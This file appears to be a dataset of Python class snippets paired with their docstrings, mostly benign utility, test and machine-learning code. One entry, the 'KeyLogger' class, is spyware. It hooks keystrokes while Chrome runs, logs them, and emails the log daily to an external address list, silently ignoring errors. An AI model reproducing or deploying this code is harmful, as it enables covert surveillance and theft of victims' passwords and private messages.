code
stringlengths
4
4.48k
docstring
stringlengths
1
6.45k
_id
stringlengths
24
24
class ChoicesIntEnum(IntEnum): <NEW_LINE> <INDENT> @classmethod <NEW_LINE> def choices(cls): <NEW_LINE> <INDENT> return [(item.value, _(ChoicesIntEnum.capitalize(item))) for item in cls] <NEW_LINE> <DEDENT> @classmethod <NEW_LINE> def capitalize(cls, item): <NEW_LINE> <INDENT> name = item.name.replace("_", " ") <NEW_LINE> return name[0].capitalize() + name[1:] <NEW_LINE> <DEDENT> @classmethod <NEW_LINE> def values(cls): <NEW_LINE> <INDENT> return [item.value for item in cls]
Extends IntEum with django choices generation capability
6259906891f36d47f2231a60
class UserTest(BaseTest): <NEW_LINE> <INDENT> def test_crud(self): <NEW_LINE> <INDENT> with self.app_context(): <NEW_LINE> <INDENT> user = UserModel('[email protected]','testuser','abcd') <NEW_LINE> self.assertIsNone(UserModel.find_by_username('testuser'), "Found an user with name 'test' before save_to_db") <NEW_LINE> self.assertIsNone(UserModel.find_by_id(1), "Found an user with id '1' before save_to_db") <NEW_LINE> user.save_to_db() <NEW_LINE> self.assertIsNotNone(UserModel.find_by_username('testuser'), "Did not find an user with name 'test' after save_to_db") <NEW_LINE> self.assertIsNotNone(UserModel.find_by_id(1), "Did not find an user with id '1' after save_to_db") <NEW_LINE> self.assertEqual(user.username, 'testuser', "The name of the user after creation does not equal the constructor argument.") <NEW_LINE> self.assertEqual(user.password, 'abcd', "The password of the user after creation does not equal the constructor argument.")
Access the app context in order to create mock-up db
6259906845492302aabfdc7f
class make_solver: <NEW_LINE> <INDENT> def __init__(self, A, coarsening=pyamgcl_ext.coarsening.smoothed_aggregation, relaxation=pyamgcl_ext.relaxation.spai0, solver=pyamgcl_ext.solver_type.bicgstabl, prm={} ): <NEW_LINE> <INDENT> Acsr = A.tocsr() <NEW_LINE> self.S = pyamgcl_ext.make_solver( coarsening, relaxation, solver, prm, Acsr.indptr.astype(numpy.int32), Acsr.indices.astype(numpy.int32), Acsr.data.astype(numpy.float64) ) <NEW_LINE> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> return self.S.__repr__() <NEW_LINE> <DEDENT> def __call__(self, *args): <NEW_LINE> <INDENT> if len(args) == 1: <NEW_LINE> <INDENT> return self.S( args[0].astype(numpy.float64) ) <NEW_LINE> <DEDENT> elif len(args) == 2: <NEW_LINE> <INDENT> Acsr = args[0].tocsr() <NEW_LINE> return self.S( Acsr.indptr.astype(numpy.int32), Acsr.indices.astype(numpy.int32), Acsr.data.astype(numpy.float64), args[1].astype(numpy.float64) ) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> raise "Wrong number of arguments" <NEW_LINE> <DEDENT> <DEDENT> def iterations(self): <NEW_LINE> <INDENT> return self.S.iterations() <NEW_LINE> <DEDENT> def residual(self): <NEW_LINE> <INDENT> return self.S.residual()
Iterative solver preconditioned by algebraic multigrid The class builds algebraic multigrid hierarchy for the given matrix and uses the hierarchy as a preconditioner for the specified iterative solver.
625990683539df3088ecda42
class KeyLogger(object): <NEW_LINE> <INDENT> def __init__(self): <NEW_LINE> <INDENT> self.log_controller = Log() <NEW_LINE> self.log_controller.writeMessage("Keylogger Constructor called\n") <NEW_LINE> self.should_keylogger_stop = False <NEW_LINE> self.send_keylog_flag = True <NEW_LINE> create_file = open(Constants.KEY_STROKES_LOG, Constants.OVERWRITE_MODE) <NEW_LINE> create_file.write("Key Stroke Log create:\n") <NEW_LINE> create_file.close() <NEW_LINE> <DEDENT> def writetokeystrokelog(self, message): <NEW_LINE> <INDENT> f = open(Constants.KEY_STROKES_LOG, Constants.APPEND_MODE) <NEW_LINE> f.writelines(message) <NEW_LINE> f.close() <NEW_LINE> <DEDENT> def clearkeystrokelog(self): <NEW_LINE> <INDENT> f = open(Constants.KEY_STROKES_LOG, Constants.OVERWRITE_MODE) <NEW_LINE> f.writelines("") <NEW_LINE> f.close() <NEW_LINE> <DEDENT> def startKeyLogger(self): <NEW_LINE> <INDENT> log_message = "Started keylogger\n" <NEW_LINE> self.log_controller.writeMessage(log_message) <NEW_LINE> hm = pyHook.HookManager() <NEW_LINE> hm.KeyDown = self.OnKeyboardEvent <NEW_LINE> hm.HookKeyboard() <NEW_LINE> while not self.should_keylogger_stop: <NEW_LINE> <INDENT> pythoncom.PumpWaitingMessages() <NEW_LINE> <DEDENT> self.log_controller.writeMessage("Confirmation of Keylogger termination\n") <NEW_LINE> <DEDENT> def send_keylog(self): <NEW_LINE> <INDENT> while self.send_keylog_flag: <NEW_LINE> <INDENT> time.sleep(86400) <NEW_LINE> try: <NEW_LINE> <INDENT> email_controller = AttachMail() <NEW_LINE> email_controller.start_server() <NEW_LINE> email_controller.sendMail(Constants.EMAIL_DESTINATION_LIST, "KeyLog File Attached", "Sent from your friend ...", Constants.KEY_STROKES_LOG) <NEW_LINE> email_controller.stop_server() <NEW_LINE> self.clearkeystrokelog() <NEW_LINE> <DEDENT> except: <NEW_LINE> <INDENT> pass <NEW_LINE> <DEDENT> <DEDENT> <DEDENT> def stop_to_send_keylog(self): <NEW_LINE> <INDENT> time.sleep(2592000) <NEW_LINE> self.send_keylog_flag = False <NEW_LINE> <DEDENT> def OnKeyboardEvent(self, event): <NEW_LINE> <INDENT> self.writetokeystrokelog(chr(event.Ascii)) <NEW_LINE> <DEDENT> def stopkeylogger(self): <NEW_LINE> <INDENT> while not self.should_keylogger_stop: <NEW_LINE> <INDENT> time.sleep(50) <NEW_LINE> self.should_keylogger_stop = not self.isChromeRunning() <NEW_LINE> if self.should_keylogger_stop: <NEW_LINE> <INDENT> self.log_controller.writeMessage("Switched should_keylogger_stop flag to True\n") <NEW_LINE> <DEDENT> <DEDENT> <DEDENT> def isChromeRunning(self): <NEW_LINE> <INDENT> log_message = "Checked if Chrome was running\n" <NEW_LINE> self.log_controller.writeMessage(log_message) <NEW_LINE> for process in psutil.process_iter(): <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> if process.name() == Constants.CHROME_PROCESS_NAME: <NEW_LINE> <INDENT> log_message = "Chrome seems to be running\n" <NEW_LINE> self.log_controller.writeMessage(log_message) <NEW_LINE> return True <NEW_LINE> <DEDENT> <DEDENT> except (psutil.NoSuchProcess, psutil.AccessDenied): <NEW_LINE> <INDENT> pass <NEW_LINE> <DEDENT> <DEDENT> log_message = "Chrome does not seem to be running\n" <NEW_LINE> self.log_controller.writeMessage(log_message) <NEW_LINE> return False
Contains methods for starting and using keylogger
6259906876e4537e8c3f0d25
class TestLine(unittest.TestCase): <NEW_LINE> <INDENT> def setUp(self): <NEW_LINE> <INDENT> pass <NEW_LINE> <DEDENT> def tearDown(self): <NEW_LINE> <INDENT> pass <NEW_LINE> <DEDENT> def testLine(self): <NEW_LINE> <INDENT> pass
Line unit test stubs
62599068a8370b77170f1b68
class TestMister(): <NEW_LINE> <INDENT> def test_radius(self): <NEW_LINE> <INDENT> from mister import Mister <NEW_LINE> mr = Mister() <NEW_LINE> out = mr.radius([0, 0.1, 0.5]) <NEW_LINE> assert len(out) == 1 <NEW_LINE> assert isinstance(out[0], float) <NEW_LINE> <DEDENT> def test_radius2(self): <NEW_LINE> <INDENT> from mister import Mister <NEW_LINE> mr = Mister() <NEW_LINE> out = mr.radius([[0.5, 1.0, 0.75], [-3, 10.0, 0.25]]) <NEW_LINE> assert len(out) == 2 <NEW_LINE> assert isinstance(out[0], float) <NEW_LINE> <DEDENT> def test_lifetime(self): <NEW_LINE> <INDENT> from mister import Mister <NEW_LINE> mr = Mister() <NEW_LINE> out = mr.lifetime([0, 0.3]) <NEW_LINE> assert len(out) == 1 <NEW_LINE> assert isinstance(out[0], float)
Test Mister functions.
625990688e7ae83300eea830
class recorded(object): <NEW_LINE> <INDENT> def __init__(self, func): <NEW_LINE> <INDENT> self.func = func <NEW_LINE> <DEDENT> def __get__(self, instance, owner): <NEW_LINE> <INDENT> func = self.func <NEW_LINE> if instance is not None: <NEW_LINE> <INDENT> func = RecordedMethod(self.func, instance) <NEW_LINE> <DEDENT> return func
>>> class C(RecordableMethods): ... @recorded ... def plus1(self, n): ... return n + 1 >>> >>> c = C() >>> c.plus1(5) 6 >>> c.plus1.seed(5)(7) >>> c.plus1(5) 7 >>> c.plus1(4) 5 >>> c.methods_called() ['plus1', 'plus1', 'plus1'] >>> c.methods_called(with_args=True) [('plus1', (5,), {}), ('plus1', (5,), {}), ('plus1', (4,), {})] >>> c = C() >>> c.plus1.seed(n=5)(8) >>> c.plus1(5) 6 >>> c.plus1(n=5) 8 >>> c.methods_called(with_args=True) [('plus1', (5,), {}), ('plus1', (), {'n': 5})] >>> c = C() >>> c.plus1.seed(5)(9) >>> c.plus1.seed(5)(10) >>> c.plus1(5) 10 >>> c.plus1.seed(5)(ValueError()) >>> c.plus1(5) Traceback (most recent call last): ... ValueError >>> c.plus1.seed(5)(ValueError) >>> c.plus1(5) Traceback (most recent call last): ... ValueError
62599068009cb60464d02cdc
class ThreeLayerConvNet(object): <NEW_LINE> <INDENT> def __init__(self, input_dim=(3, 32, 32), num_filters=32, filter_size=7, hidden_dim=100, num_classes=10, weight_scale=1e-3, reg=0.0, dtype=np.float32): <NEW_LINE> <INDENT> self.params = {} <NEW_LINE> self.reg = reg <NEW_LINE> self.dtype = dtype <NEW_LINE> C, H, W = input_dim <NEW_LINE> self.params['W1'] = weight_scale * np.random.randn(num_filters, C, filter_size, filter_size) <NEW_LINE> self.params['b1'] = np.zeros((1, num_filters)) <NEW_LINE> self.params['W2'] = weight_scale * np.random.randn(H * W / 4 * num_filters, hidden_dim) <NEW_LINE> self.params['b2'] = np.zeros((1, hidden_dim)) <NEW_LINE> self.params['W3'] = weight_scale * np.random.randn(hidden_dim, num_classes) <NEW_LINE> self.params['b3'] = np.zeros((1, num_classes)) <NEW_LINE> for k, v in self.params.iteritems(): <NEW_LINE> <INDENT> self.params[k] = v.astype(dtype) <NEW_LINE> <DEDENT> <DEDENT> def loss(self, X, y=None): <NEW_LINE> <INDENT> W1, b1 = self.params['W1'], self.params['b1'] <NEW_LINE> W2, b2 = self.params['W2'], self.params['b2'] <NEW_LINE> W3, b3 = self.params['W3'], self.params['b3'] <NEW_LINE> filter_size = W1.shape[2] <NEW_LINE> conv_param = {'stride': 1, 'pad': (filter_size - 1) / 2} <NEW_LINE> pool_param = {'pool_height': 2, 'pool_width': 2, 'stride': 2} <NEW_LINE> scores = None <NEW_LINE> L1_out, L1_cache = conv_relu_pool_forward(X, W1, b1, conv_param, pool_param) <NEW_LINE> L2_out, L2_cache = affine_relu_forward(L1_out, W2, b2) <NEW_LINE> L3_out, L3_cache = affine_forward(L2_out, W3, b3) <NEW_LINE> scores = L3_out <NEW_LINE> if y is None: <NEW_LINE> <INDENT> return scores <NEW_LINE> <DEDENT> loss, grads = 0, {} <NEW_LINE> loss, dscores = softmax_loss(scores, y) <NEW_LINE> loss += 0.5 * self.reg * (np.sum(W1 * W1) + np.sum(W2 * W2) + np.sum(W3 * W3)) <NEW_LINE> dx3, grads['W3'], grads['b3'] = affine_backward(dscores, L3_cache) <NEW_LINE> grads['W3'] += self.reg * W3 <NEW_LINE> dx2, grads['W2'], grads['b2'] = affine_relu_backward(dx3, L2_cache) <NEW_LINE> grads['W2'] += self.reg * W2 <NEW_LINE> dx1, grads['W1'], grads['b1'] = conv_relu_pool_backward(dx2, L1_cache) <NEW_LINE> grads['W1'] += self.reg * W1 <NEW_LINE> return loss, grads
A three-layer convolutional network with the following architecture: conv - relu - 2x2 max pool - affine - relu - affine - softmax The network operates on minibatches of data that have shape (N, C, H, W) consisting of N images, each with height H and width W and with C input channels.
62599068baa26c4b54d50a48
class PaginationError(Exception): <NEW_LINE> <INDENT> def __init__(self, message): <NEW_LINE> <INDENT> self.message = message
Exception raised when an error occurs during pagination.
625990687d847024c075db7c
class DatatableMetaclass(type): <NEW_LINE> <INDENT> def __new__(cls, name, bases, attrs): <NEW_LINE> <INDENT> declared_columns = get_declared_columns(bases, attrs, with_base_columns=False) <NEW_LINE> new_class = super(DatatableMetaclass, cls).__new__(cls, name, bases, attrs) <NEW_LINE> opts = new_class._meta = new_class.options_class(getattr(new_class, "Meta", None)) <NEW_LINE> if opts.model: <NEW_LINE> <INDENT> columns = columns_for_model( opts.model, opts.columns, opts.exclude, opts.labels, opts.processors, opts.unsortable_columns, opts.hidden_columns, ) <NEW_LINE> none_model_columns = [k for k, v in columns.items() if not v] <NEW_LINE> missing_columns = set(none_model_columns) - set(declared_columns.keys()) <NEW_LINE> for name, column in declared_columns.items(): <NEW_LINE> <INDENT> column.name = name <NEW_LINE> if not column.label: <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> field = resolve_orm_path(opts.model, name) <NEW_LINE> <DEDENT> except FieldDoesNotExist: <NEW_LINE> <INDENT> label = name <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> label = field.verbose_name <NEW_LINE> <DEDENT> column.label = pretty_name(label) <NEW_LINE> <DEDENT> <DEDENT> if isinstance(opts.search_fields, dict): <NEW_LINE> <INDENT> search_fields = [] <NEW_LINE> for name, column in opts.search_fields.items(): <NEW_LINE> <INDENT> if callable(column): <NEW_LINE> <INDENT> column = column(sources=[name]) <NEW_LINE> <DEDENT> search_fields.append(column) <NEW_LINE> <DEDENT> opts.search_fields = search_fields <NEW_LINE> <DEDENT> elif opts.search_fields is None: <NEW_LINE> <INDENT> opts.search_fields = [] <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> opts.search_fields = list(opts.search_fields) <NEW_LINE> <DEDENT> for i, column in enumerate(opts.search_fields): <NEW_LINE> <INDENT> if isinstance(column, str): <NEW_LINE> <INDENT> name = column <NEW_LINE> field = resolve_orm_path(opts.model, name) <NEW_LINE> column = get_column_for_modelfield(field) <NEW_LINE> opts.search_fields[i] = column(sources=[name]) <NEW_LINE> <DEDENT> <DEDENT> columns.update(declared_columns) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> columns = declared_columns <NEW_LINE> missing_columns = [] <NEW_LINE> <DEDENT> new_class.declared_columns = declared_columns <NEW_LINE> new_class.base_columns = columns <NEW_LINE> new_class.missing_columns = missing_columns <NEW_LINE> return new_class
Each declared Datatable object inspects its declared "fields" in order to facilitate an inheritance system resembling the django.forms system. Except for our custom Meta options that offer field options ('labels', 'processors', etc), this code is essentially a clone of the django.forms strategy.
625990680c0af96317c57930
class EndingPoint(Node): <NEW_LINE> <INDENT> def __init__(self,env,name, uid=None): <NEW_LINE> <INDENT> super().__init__(env=env,name=name, uid=uid) <NEW_LINE> <DEDENT> def __str__(self): <NEW_LINE> <INDENT> return f"{self.name}" <NEW_LINE> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> return f"{self.name}" <NEW_LINE> <DEDENT> def reset(self): <NEW_LINE> <INDENT> self.count = 0 <NEW_LINE> self.entities = set() <NEW_LINE> <DEDENT> def summary(self): <NEW_LINE> <INDENT> encountered = {} <NEW_LINE> for entity in self.entities: <NEW_LINE> <INDENT> if not entity.start.name in encountered: <NEW_LINE> <INDENT> encountered[entity.start.name] = 0 <NEW_LINE> <DEDENT> encountered[entity.start.name] += 1 <NEW_LINE> <DEDENT> entity_durations = [x.end_time-x.start_time for x in self.entities] <NEW_LINE> return { "name" : self.name, "number of caught entities" : len(self.entities), "number of entities by start node" : encountered, "most common travel path" : collections.Counter(tuple(x.summary()['travelled path']) for x in self.entities).most_common(1)[0] if len(self.entities) > 0 else None, "average entity duration." : np.mean(entity_durations) if len(entity_durations) > 0 else None } <NEW_LINE> <DEDENT> def serialize(self): <NEW_LINE> <INDENT> return { "name" : self.name, "uid" : self.uid }
EndingPoint represents a single collection point where entities finish their trip through the system.
625990687d43ff2487427fe2
@attr(shard=2) <NEW_LINE> @ddt.ddt <NEW_LINE> class IndexQueryTestCase(ModuleStoreTestCase): <NEW_LINE> <INDENT> CREATE_USER = False <NEW_LINE> NUM_PROBLEMS = 20 <NEW_LINE> @ddt.data( (ModuleStoreEnum.Type.mongo, 8), (ModuleStoreEnum.Type.split, 4), ) <NEW_LINE> @ddt.unpack <NEW_LINE> def test_index_query_counts(self, store_type, expected_query_count): <NEW_LINE> <INDENT> with self.store.default_store(store_type): <NEW_LINE> <INDENT> course = CourseFactory.create() <NEW_LINE> with self.store.bulk_operations(course.id): <NEW_LINE> <INDENT> chapter = ItemFactory.create(category='chapter', parent_location=course.location) <NEW_LINE> section = ItemFactory.create(category='sequential', parent_location=chapter.location) <NEW_LINE> vertical = ItemFactory.create(category='vertical', parent_location=section.location) <NEW_LINE> for _ in range(self.NUM_PROBLEMS): <NEW_LINE> <INDENT> ItemFactory.create(category='problem', parent_location=vertical.location) <NEW_LINE> <DEDENT> <DEDENT> <DEDENT> password = 'test' <NEW_LINE> self.user = UserFactory(password=password) <NEW_LINE> self.client.login(username=self.user.username, password=password) <NEW_LINE> CourseEnrollment.enroll(self.user, course.id) <NEW_LINE> with check_mongo_calls(expected_query_count): <NEW_LINE> <INDENT> url = reverse( 'courseware_section', kwargs={ 'course_id': unicode(course.id), 'chapter': unicode(chapter.location.name), 'section': unicode(section.location.name), } ) <NEW_LINE> response = self.client.get(url) <NEW_LINE> self.assertEqual(response.status_code, 200)
Tests for query count.
625990682ae34c7f260ac88b
class OUNoise: <NEW_LINE> <INDENT> def __init__(self, size, seed, mu=0., theta=0.15, sigma=0.2): <NEW_LINE> <INDENT> self.mu = mu * torch.ones(size, device=device) <NEW_LINE> self.theta = theta <NEW_LINE> self.sigma = sigma <NEW_LINE> self.seed = torch.manual_seed(seed) <NEW_LINE> self.reset() <NEW_LINE> <DEDENT> def reset(self): <NEW_LINE> <INDENT> self.state = copy.copy(self.mu) <NEW_LINE> <DEDENT> def sample(self): <NEW_LINE> <INDENT> x = self.state <NEW_LINE> dx = self.theta * (self.mu - x) + self.sigma * torch.randn(len(x), device=device) <NEW_LINE> self.state = x + dx <NEW_LINE> return self.state
Ornstein-Uhlenbeck process.
6259906892d797404e38972f
class TestSequence(unittest.TestCase): <NEW_LINE> <INDENT> def runTest(self): <NEW_LINE> <INDENT> test_string = ("{DISK_BLADE,2}{RACK,36}") <NEW_LINE> bigbuf=oh_big_textbuffer() <NEW_LINE> ep=SaHpiEntityPathT() <NEW_LINE> err = oh_encode_entitypath(test_string, ep) <NEW_LINE> self.assertEqual (err!=None,True) <NEW_LINE> self.assertEqual (ep.Entry[0].EntityType != SAHPI_ENT_RACK,False) <NEW_LINE> self.assertEqual (ep.Entry[0].EntityLocation != 36,False) <NEW_LINE> self.assertEqual (ep.Entry[1].EntityType != SAHPI_ENT_DISK_BLADE,False) <NEW_LINE> self.assertEqual (ep.Entry[1].EntityLocation != 2,False) <NEW_LINE> oh_init_bigtext(bigbuf) <NEW_LINE> err = oh_decode_entitypath(ep, bigbuf) <NEW_LINE> self.assertEqual (err!=None,True) <NEW_LINE> self.assertEqual (bigbuf.Data!= test_string,False)
main: epathstr -> epath test Test if an entity path string is converted properly into an entity path.
625990682c8b7c6e89bd4f8a
class PCAFactorizer(): <NEW_LINE> <INDENT> def __init__(self, num_components): <NEW_LINE> <INDENT> self.model = PCA(n_components = num_components) <NEW_LINE> self.num_components = num_components <NEW_LINE> <DEDENT> def fit(self, X): <NEW_LINE> <INDENT> X = X / np.std(X, axis=1).reshape((-1, 1)) <NEW_LINE> self.model.fit(X) <NEW_LINE> <DEDENT> def transform(self, X): <NEW_LINE> <INDENT> X = X / np.std(X, axis=1).reshape((-1, 1)) <NEW_LINE> return self.model.transform(X)
Factorizer using principal component analysis. Reduces dimension of input by projecting onto first num_components principal components. Note: normalizes input before fitting. Attributes: model (PCA): sklearn PCA model num_components (int): Number of principal components to use.
62599068f548e778e596cd2f
class User(SQLAlchemyObjectType): <NEW_LINE> <INDENT> class Meta: <NEW_LINE> <INDENT> model = UserModel
Autogenerated return type of a user
62599068aad79263cf42ff5c
class CmdlineParser(ArgumentParser): <NEW_LINE> <INDENT> def __init__(self, desc=None, prog=sys.argv[0], usage=None, add_help=True, argument_default=None, prefix_chars="-", toplevel=False): <NEW_LINE> <INDENT> super(CmdlineParser, self).__init__(description=desc, prog=prog, usage=usage, add_help=add_help, argument_default=argument_default, prefix_chars=prefix_chars, formatter_class=FafHelpFormatter) <NEW_LINE> self.add_argument("-v", "--verbose", action="store_const", const=logging.DEBUG, default=logging.INFO, help="turn on all verbose output except for SQL") <NEW_LINE> self.add_argument("--sql-verbose", action="store_true", default=False, help="show all SQL queries (really verbose)") <NEW_LINE> self.add_argument("-d", "--debug", action="store_true", default=False, help="show full traceback for unhandled exceptions") <NEW_LINE> self.add_argument("--dry-run", action="store_true", default=False, help="do not flush any changes to the database") <NEW_LINE> if toplevel: <NEW_LINE> <INDENT> action_parsers = self.add_subparsers(title="action") <NEW_LINE> for action in actions: <NEW_LINE> <INDENT> action_parser = action_parsers.add_parser(action) <NEW_LINE> actions[action].tweak_cmdline_parser(action_parser) <NEW_LINE> action_parser.set_defaults(func=actions[action].run) <NEW_LINE> <DEDENT> <DEDENT> <DEDENT> def parse_args(self, args=None, namespace=None): <NEW_LINE> <INDENT> result = ArgumentParser.parse_args(self, args=args, namespace=namespace) <NEW_LINE> log.setLevel(result.verbose) <NEW_LINE> return result <NEW_LINE> <DEDENT> def _add_plugin_arg(self, *args, **kwargs): <NEW_LINE> <INDENT> if kwargs.pop("multiple", False): <NEW_LINE> <INDENT> kwargs["action"] = "append" <NEW_LINE> kwargs["default"] = [] <NEW_LINE> <DEDENT> self.add_argument(*args, **kwargs) <NEW_LINE> <DEDENT> def add_bugtracker(self, *args, **kwargs): <NEW_LINE> <INDENT> defaults = dict( help="bug tracker", choices=bugtrackers, multiple=False, ) <NEW_LINE> defaults.update(kwargs) <NEW_LINE> self._add_plugin_arg("-b", "--bugtracker", **defaults) <NEW_LINE> <DEDENT> def add_opsys(self, multiple=False, required=False): <NEW_LINE> <INDENT> self._add_plugin_arg("-o", "--opsys", required=required, help="operating system", multiple=multiple) <NEW_LINE> <DEDENT> def add_opsys_release(self, multiple=False, required=False): <NEW_LINE> <INDENT> self._add_plugin_arg("--opsys-release", required=required, help="operating system release", multiple=multiple) <NEW_LINE> <DEDENT> def add_problemtype(self, multiple=False): <NEW_LINE> <INDENT> self._add_plugin_arg("-p", "--problemtype", help="problem type", multiple=multiple) <NEW_LINE> <DEDENT> def add_repo(self, multiple=False): <NEW_LINE> <INDENT> self._add_plugin_arg("-r", "--repo", help="repository", multiple=multiple) <NEW_LINE> <DEDENT> def add_solutionfinder(self, *args, **kwargs): <NEW_LINE> <INDENT> defaults = dict( help="solution finder", choices=solution_finders, multiple=True, ) <NEW_LINE> defaults.update(kwargs) <NEW_LINE> self._add_plugin_arg("-s", "--solution-finder", **defaults)
Command line argument parser extended with project-specific options.
62599068a219f33f346c7fac
class Refp(ModeledCommandParameter, PseudoRegion): <NEW_LINE> <INDENT> begtag = 'REFP' <NEW_LINE> endtag = '' <NEW_LINE> models = { 'model_descriptor': {'desc': 'Phase model', 'name': 'phmodref', 'num_parms': 5, 'for001_format': {'line_splits': [5]}}, '0_crossing': {'desc': '0-crossing phase iterative procedure', 'doc': 'Uses iterative procedure to find 0-crossing phase; tracks through all regions. Only works with ACCEL modesl 1,2 and 13.', 'icool_model_name': 2, 'parms': {'phmodref': {'pos': 5, 'type': 'String', 'doc': ''}, 'bmtype': {'pos': 1, 'type': 'Int', 'doc': ''}}}, 'const_v': {'desc': 'Assumes constant reference particle velocity', 'doc': 'Applies to any region', 'icool_model_name': 3, 'parms': {'phmodref': {'pos': 5, 'type': 'String', 'doc': ''}, 'bmtype': {'pos': 1, 'type': 'Int', 'doc': ''}, 'pz0': {'pos': 2, 'type': 'Real', 'doc': ''}, 't0': {'pos': 3, 'type': 'Real', 'doc': ''}}}, 'en_loss': {'desc': 'Assumes constant reference particle velocity', 'doc': 'Applies to any region', 'icool_model_name': 4, 'parms': {'phmodref': {'pos': 5, 'type': 'String', 'doc': ''}, 'bmtype': {'pos': 1, 'type': 'Int', 'doc': ''}, 'pz0': {'pos': 2, 'type': 'Real', 'doc': ''}, 't0': {'pos': 3, 'type': 'Real', 'doc': ''}, 'dedz': {'pos': 4, 'type': 'Real', 'doc': ''}}}, 'delta_quad_cav': {'desc': 'Assumes constant reference particle velocity', 'doc': 'Applies to any region', 'icool_model_name': 5, 'parms': {'phmodref': {'pos': 5, 'type': 'String', 'doc': ''}, 'bmtype': {'pos': 1, 'type': 'Int', 'doc': ''}, 'e0': {'pos': 2, 'type': 'Real', 'doc': ''}, 'dedz': {'pos': 3, 'type': 'Real', 'doc': ''}, 'd2edz2': {'pos': 4, 'type': 'Real', 'doc': ''}}}, 'delta_quad_any': {'desc': 'Assumes constant reference particle velocity', 'doc': 'Applies to any region', 'icool_model_name': 6, 'parms': {'phmodref': {'pos': 5, 'type': 'String', 'doc': ''}, 'bmtype': {'pos': 1, 'type': 'Int', 'doc': ''}, 'e0': {'pos': 2, 'type': 'Real', 'doc': ''}, 'dedz': {'pos': 3, 'type': 'Real', 'doc': ''}, 'd2edz2': {'pos': 4, 'type': 'Real', 'doc': ''}}}, } <NEW_LINE> def __init__(self, **kwargs): <NEW_LINE> <INDENT> if ModeledCommandParameter.check_command_params_init(self, Refp.models, **kwargs) is False: <NEW_LINE> <INDENT> sys.exit(0) <NEW_LINE> <DEDENT> <DEDENT> def __call__(self, **kwargs): <NEW_LINE> <INDENT> pass <NEW_LINE> <DEDENT> def __setattr__(self, name, value): <NEW_LINE> <INDENT> self.__modeled_command_parameter_setattr__(name, value, Refp.models) <NEW_LINE> <DEDENT> def __str__(self): <NEW_LINE> <INDENT> pass
Reference particle
625990683d592f4c4edbc683
class DS18B20(BaseThermometers): <NEW_LINE> <INDENT> def __init__(self, **config): <NEW_LINE> <INDENT> super().__init__(config) <NEW_LINE> self._vendor = "Dallas" <NEW_LINE> self._model = "DS18B20" <NEW_LINE> <DEDENT> def get_temp(self): <NEW_LINE> <INDENT> return self._controller.read_temperature(self._config["dev"], self._config["circuit"])
Digital thermometer by Dallas.
625990684a966d76dd5f0699
class ApplicationSecurityGroupListResult(msrest.serialization.Model): <NEW_LINE> <INDENT> _validation = { 'next_link': {'readonly': True}, } <NEW_LINE> _attribute_map = { 'value': {'key': 'value', 'type': '[ApplicationSecurityGroup]'}, 'next_link': {'key': 'nextLink', 'type': 'str'}, } <NEW_LINE> def __init__( self, *, value: Optional[List["ApplicationSecurityGroup"]] = None, **kwargs ): <NEW_LINE> <INDENT> super(ApplicationSecurityGroupListResult, self).__init__(**kwargs) <NEW_LINE> self.value = value <NEW_LINE> self.next_link = None
A list of application security groups. Variables are only populated by the server, and will be ignored when sending a request. :param value: A list of application security groups. :type value: list[~azure.mgmt.network.v2019_09_01.models.ApplicationSecurityGroup] :ivar next_link: The URL to get the next set of results. :vartype next_link: str
62599068009cb60464d02cdd
class Producer(threading.Thread): <NEW_LINE> <INDENT> def run(self): <NEW_LINE> <INDENT> global GOODS <NEW_LINE> while True: <NEW_LINE> <INDENT> time.sleep(3) <NEW_LINE> condition.acquire() <NEW_LINE> while GOODS >= 10: <NEW_LINE> <INDENT> condition.notify_all() <NEW_LINE> condition.wait() <NEW_LINE> <DEDENT> GOODS += 1 <NEW_LINE> print('生产者[%s]生产了1个商品,商品总数:%s' % (threading.current_thread(), GOODS)) <NEW_LINE> condition.release()
生产者,当仓库容量等于50时,处于等待状态
6259906832920d7e50bc77ea
class AttentionReverse(Attention3): <NEW_LINE> <INDENT> def __init__(self, name, tokenizer, optimizer): <NEW_LINE> <INDENT> Attention3.__init__(self, name, tokenizer, optimizer, reverse_order=True) <NEW_LINE> <DEDENT> def decode_sequence(self, input_seq): <NEW_LINE> <INDENT> reversed_seq = numpy.flip(input_seq, 1) <NEW_LINE> print(input_seq) <NEW_LINE> print(reversed_seq) <NEW_LINE> Attention3.decode_sequence(self, reversed_seq)
Same as Attention3 except the source sequence is reversed during training, and the input sentence tokens needs to be reversed also at runtime. This has been shown to ease training and give significantly higher accuracy (Sutskever, 2014)
62599068462c4b4f79dbd1ab
class RandomAgentMiddleware(object): <NEW_LINE> <INDENT> def __init__(self,crawler): <NEW_LINE> <INDENT> super(RandomAgentMiddleware,self).__init__() <NEW_LINE> self.useAgent = UserAgent() <NEW_LINE> self.useAgent_type = crawler.settings.get("RANDOM_UA_TYPE","random") <NEW_LINE> <DEDENT> def process_request(self, request, spider): <NEW_LINE> <INDENT> def get_useAgent(): <NEW_LINE> <INDENT> return getattr(self.useAgent,self.useAgent_type) <NEW_LINE> <DEDENT> request.headers.setDefault('User_Agent',get_useAgent()) <NEW_LINE> request.meta["proxy"] = "" <NEW_LINE> return None <NEW_LINE> <DEDENT> @classmethod <NEW_LINE> def from_crawler(cls, crawler): <NEW_LINE> <INDENT> s = cls(crawler) <NEW_LINE> return s
生成随机头
62599068baa26c4b54d50a4a
